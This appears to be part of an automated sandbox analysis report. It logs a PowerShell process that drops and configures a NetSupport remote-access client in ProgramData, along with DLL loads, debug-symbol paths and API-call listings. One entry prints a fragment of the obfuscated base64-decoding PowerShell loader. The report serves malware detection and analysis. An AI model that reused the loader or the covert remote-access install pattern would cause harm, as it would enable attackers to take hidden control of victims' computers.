                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe, Section loaded: psfruntime64.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe, Section loaded: kernel.appcore.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe, Section loaded: windows.storage.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe, Section loaded: wldp.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe, Section loaded: daxexec.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe, Section loaded: fltlib.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe, Section loaded: profapi.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe, Section loaded: container.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe, Section loaded: appxdeploymentclient.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: Google Drive.lnk.0.dr, LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr, LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr, LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr, LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\ProgramData\netsupport\client\client32.iniJump to behavior
                                    Source: C:\ProgramData\netsupport\client\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dll
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\ProgramData\netsupport\client\msvcr100.dllJump to behavior
                                    Source: Binary string: D:\a\1\s\x64\Release\PsfLauncher64.pdb source: PsfLauncher64.exe, 00000014.00000000.1745032807.00007FF6C367E000.00000002.00000001.01000000.0000000E.sdmp
                                    Source: Binary string: D:\a\1\s\x64\Release\PsfRuntime64.pdb source: PsfRunDll64.exe, 00000016.00000002.1749156584.00007FFA1B0EF000.00000002.00000001.01000000.0000000F.sdmp
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2653892978.000000006C1B2000.00000002.00000001.01000000.00000019.sdmp, PCICHEK.DLL.26.dr
                                    Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 0000001A.00000002.1968531120.00000231631AF000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000020.00000002.2639330298.000000006C0F1000.00000020.00000001.01000000.0000001A.sdmp, msvcr100.dll.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.26.dr
                                    Source: Binary string: client32_ctr.pdb0\1100\client32\Release\client32_ctr.pdbP source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
                                    Source: Binary string: client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2654970934.0000000074675000.00000002.00000001.01000000.00000018.sdmp, pcicapi.dll.26.dr
                                    Source: Binary string: D:\a\1\s\x64\Release\PsfRunDll64.pdb source: PsfRunDll64.exe, 00000016.00000000.1747207751.00007FF695D50000.00000002.00000001.01000000.00000010.sdmp
                                    Source: Binary string: 0\1100\client32\Release\client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
                                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000001A.00000002.2187481682.00000231793A5000.00000004.00000020.00020000.00000000.sdmp

                                    Data Obfuscation

                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($UbzXTvljYeqTglbzWFYnHcYrl)) $djCLjZagYgaEPajHwbPPt = "usradm" if ($uxuQItyI.Contains($djCLjZagYgaEPajHwbPPt)) { try { $oXtyKRiEpmXFEtumyER
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11029200 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,32_2_11029200
                                    Source: PCICL32.DLL.26.drStatic PE information: section name: .hhshare
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BAF4636C push ds; ret 23_2_00007FF9BAF4636F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB1A46DC push ds; retf 23_2_00007FF9BB1A474F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB1A6FA5 pushad ; retf 23_2_00007FF9BB1A6FA6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB1A6EBD push eax; retf 23_2_00007FF9BB1A6EBE
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB5447F5 push ebx; iretd 23_2_00007FF9BB5447FA
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB6A282A pushad ; iretd 23_2_00007FF9BB6A2832
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB6912D0 pushad ; ret 23_2_00007FF9BB6912E4
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB6962BC pushad ; ret 23_2_00007FF9BB6962B4
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB69629C pushad ; ret 23_2_00007FF9BB6962B4
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB6980FC push ebx; ret 23_2_00007FF9BB69813A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BAF68133 push ebx; ret 25_2_00007FF9BAF6813A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB1C4C8E push eax; iretd 25_2_00007FF9BB1C4C8F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB1C7BD4 push esi; ret 25_2_00007FF9BB1C7BD7
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB1C46DC push ds; retf 25_2_00007FF9BB1C474F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB1C4D76 pushad ; iretd 25_2_00007FF9BB1C4D77
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3F33A1 push edi; retf 25_2_00007FF9BB3F33A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB575776 pushad ; retf 25_2_00007FF9BB5759DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB5758FF pushad ; retf 25_2_00007FF9BB5759DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB572CE0 push esp; retf 25_2_00007FF9BB572CE1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB77225B push ds; retf 25_2_00007FF9BB77226D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB77325B push cs; retf 25_2_00007FF9BB773272
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB770E78 push ds; retf 25_2_00007FF9BB770E79
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB770299 push ds; retf 25_2_00007FF9BB77029F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB7725DF push es; retf 25_2_00007FF9BB7725EF
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB7721F7 push ds; retf 25_2_00007FF9BB7721F8
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB7731FC push cs; retf 25_2_00007FF9BB7731FD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB771017 push ss; retf 25_2_00007FF9BB771018
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB771625 push ss; retf 25_2_00007FF9BB771626
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB77082E push ds; retf 25_2_00007FF9BB770832
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB772037 push es; retf 25_2_00007FF9BB77203B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB771836 push cs; retf 25_2_00007FF9BB77183A
                                    Source: msvcr100.dll.26.drStatic PE information: section name: .text entropy: 6.909044922675825
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\PCICHEK.DLLJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\msvcr100.dllJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\AudioCapture.dllJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\TCCTL32.DLLJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\remcmdstub.exeJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\client32.exeJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\pcicapi.dllJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\PCICL32.DLLJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\HTCTL32.DLLJump to dropped file
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEC7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,32_2_6BEC7030
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11124DC0 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,32_2_11124DC0

                                    Hooking and other Techniques for Hiding and Protection

                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_111365D0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,32_2_111365D0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,32_2_11157150
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11025180 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,32_2_11025180
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11157550 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,32_2_11157550
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110255D0 IsIconic,BringWindowToTop,GetCurrentThreadId,32_2_110255D0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1110F720 IsIconic,GetTickCount,32_2_1110F720
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,32_2_1111F990
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110238A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,32_2_110238A0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110BFC50 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,32_2_110BFC50
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11023F80 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,32_2_11023F80
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11110340 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,32_2_11110340
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,32_2_110CA260
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11029200 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,32_2_11029200
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
